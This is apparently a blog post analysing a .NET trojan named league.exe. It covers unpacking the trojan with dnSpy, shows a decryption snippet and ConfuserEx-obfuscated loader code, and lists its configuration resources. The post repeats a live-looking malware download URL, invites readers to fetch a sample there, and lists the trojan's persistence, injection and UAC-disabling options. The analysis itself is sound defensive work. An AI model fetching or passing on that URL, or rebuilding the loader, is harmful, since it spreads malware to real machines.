hardwarefetish.com

league.exe trojan

I recently stumbled over an infected setup application from dubious sources in the internet on a victim’s machine that contained a little obfuscated trojan which was interestingly written in .NET language, so it was pretty easy to reverse engineer.
The trojan contantly downloads itself from http://ijwhite.com/white/League.exe so you can download your own sample from there.

The trojan itself is crypted with AES encryption with a static key, which is very easy to unpack with a debugger like dnSpy. The code’s function names are obfuscated, so it doesn’t make much sense to read, but you just need to set a breakpoint before the unpacked .NET executable gets invoked and dump the decrypted memory buffer (in variable array) to disk, which can in turn be analyzed.

object obj = ze6WLzdqTLKVYk8yNb.qbpi2wrp4C09();
ze6WLzdqTLKVYk8yNb.Ssp0paUgqt("Key", obj, tqcF9712cQGgO);
ze6WLzdqTLKVYk8yNb.Ssp0paUgqt("IV", obj, tqcF9712cQGgO2);
object rXmEJKEg1Mp2m = ze6WLzdqTLKVYk8yNb.XYHLcqkA7W(obj);
array = ze6WLzdqTLKVYk8yNb.yGbemlFTZJdQjrX(rXmEJKEg1Mp2m, array);
object 6XaGtsti8u = ze6WLzdqTLKVYk8yNb.dXvj2MauvNk7t();

 Now you get an executable file named stub which in turn can be analyzed with dnSpy.
The executable is “obfuscated” with ConfuserEx v1.0.0.0.
This results in code that is difficult an annoying to read, like:

private static void Main(string[] args)
{
stub.res = stub.\u202D\u200D\u206B\u202C\u202B\u206D\u206E\u202A\u206C\u200E\u200F\u206D\u202B\u206E\u202B\u206A\u206F\u206C\u200B\u202E\u202E\u200D\u206E\u200D\u202E\u202B\u202A\u206D\u206E\u202B\u200C\u200E\u202B\u206F\u202E\u206E\u200D\u206D\u206A\u202E\u202E(<Module>.\u206D\u200B\u206B\u206C\u200D\u200E\u202E\u202E\u202B\u202A\u200D\u202C\u202A\u206A\u206B\u206B\u206A\u202C\u200C\u200F\u206F\u206E\u200E\u206C\u206C\u206B\u206F\u206B\u200F\u206E\u200D\u202E\u206B\u206D\u202C\u202C\u200C\u202D\u200D\u206A\u202E<string>(1666502779u), stub.\u202E\u202D\u200D\u200D\u206D\u206E\u206F\u206A\u202D\u206A\u200F\u202B\u202A\u206B\u200F\u206A\u202C\u206B\u206B\u200C\u206C\u206A\u202E\u200D\u202A\u206B\u200B\u206C\u206C\u206A\u200D\u200B\u206E\u200B\u200E\u202D\u200C\u200C\u206D\u202E\u202E());
for (;;)
{
IL_19:
uint num = 3253124917u;
for (;;)
{
uint num2;
switch ((num2 = (num ^ 2504117526u)) % 3u)
{
case 0u:
goto IL_19;
case 1u:
stub.\u202B\u200E\u206E\u206B\u206C\u202C\u206C\u206C\u200D\u202B\u202B\u200C\u206F\u206F\u206A\u200F\u206D\u200F\u200B\u200C\u206B\u202A\u200F\u206C\u206D\u200E\u206E\u206D\u206D\u200E\u202C\u202E\u206F\u206C\u206A\u200E\u206B\u206F\u206F\u202A\u202E(stub.\u200C\u206C\u206D\u206A\u202C\u200E\u206B\u200E\u202C\u202A\u200F\u202D\u206C\u200E\u200C\u200B\u206B\u202C\u202C\u200B\u200D\u206A\u200D\u200E\u202D\u200D\u202E\u202A\u206D\u206D\u200C\u202B\u200C\u206F\u200D\u206A\u202B\u200E\u206E\u202A\u202E(), new ResolveEventHandler(stub.CurrentDomain_AssemblyResolve));
num = (num2 * 307612828u ^ 2864558313u);
continue;
}
goto Block_1;
}
}
Block_1:
stub.Run(args);
}

Fortunately, there are tools out there for deobfuscating this Confuser stuff. Tools for doing so are linked here.
Afterwards, you get a pretty readable copy of the trojan.

Judging from that, the trojan has multiple settings for injection,propagation, download, etc. Everything seems to be configurable via the resources-Section of the executable.
By looking at this specific trojan, it seems to be pretty dump and just downloads itself all over again and again and again. I suspect that the author may swap out the executable, possiby targeting different victim machines, by providing a copy of the trojan with a different configuration on a case-by-case basis, but this is just speculative.
Here is the resource section of the above mentioned trojan:

// 0x0001BE74: STUB.resources‎ (4868276 Bytes, Embedded, Public)


// 0x0001C75E: AdminRights‎ = False
// 0x0001C760: AntiDump‎ = False
// 0x0001C762: AntiSandboxie‎ = False
// 0x0001C764: AttributeHidden‎ = False
// 0x0001C766: AttributeSystem‎ = False
// 0x0001C768: BinderItems‎ = Object[][]-Array
// 0x00433FF9: CMDArgsFixed‎ = ""
// 0x00433FFB: CMDArgsType‎ = 0
// 0x00434000: CompressionGZIP‎ = False
// 0x00434002: CompressionLZMA‎ = False
// 0x00434004: CreationDateEnabled‎ = False
// 0x00434006: CreationDateValue‎ = 10.08.2016 17:36:12
// 0x0043400F: DisableCMD‎ = False
// 0x00434011: DisableSafeMode‎ = False
// 0x00434013: DisableSystemRestore‎ = False
// 0x00434015: DisableTaskManager‎ = False
// 0x00434017: DownloaderItems‎ = Object[][]-Array: ["http://ijwhite.com/white/League.exe", "CommonApplicationData"]
// 0x00434039: InjectionType‎ = 0
// 0x0043404E: MainFile‎ = 567808 Bytes
// 0x004BEA53: MessageButton‎ = 0
// 0x004BEA58: MessageEnabled‎ = False
// 0x004BEA5A: MessageIcon‎ = 0
// 0x004BEA5F: MessageOnlyOnce‎ = False
// 0x004BEA61: MessageText‎ = "Text"
// 0x004BEA67: MessageTitle‎ = "Title"
// 0x0043403E: MUTEX‎ = "TPfQHumqPQ5RUn"
// 0x004BEA6E: PersistenceStartup‎ = False
// 0x004BEA70: PersistenceSystemWide‎ = False
// 0x004BEA72: PersistenceWatchingProcess‎ = False
// 0x004BEA74: ProcessKiller‎ = String[]-Array
// 0x004BEA90: ProtectionAntiMemory‎ = False
// 0x004BEA92: ProtectionBSOD‎ = False
// 0x004BEA94: ProtectionDisableUAC‎ = False
// 0x004BEA96: ProtectionElevatedProcess‎ = False
// 0x004BEA98: RunPEDll‎ = 5658 Bytes
// 0x004C00B7: StartupAdvanced‎ = False
// 0x004C00B9: StartupEnabled‎ = False
// 0x004C00BB: StartupFileName‎ = "filename.exe"
// 0x004C00C9: StartupFolderName‎ = ""
// 0x004C00CB: StartupForceRestart‎ = False
// 0x004C00CD: StartupLocation‎ = "Desktop"
// 0x004C00D6: StartupMelt‎ = False
// 0x004C00D8: StartupName‎ = "Update"
// 0x004C00E0: StartupTask‎ = "...code for task XML file, removed for readbility..."
// 0x004C0724: ZoneIDDelete‎ = True
// 0x004C0726: ZoneIDEnabled‎ = False

If someone knows more about this trojan, please let me know.

Leave a Comment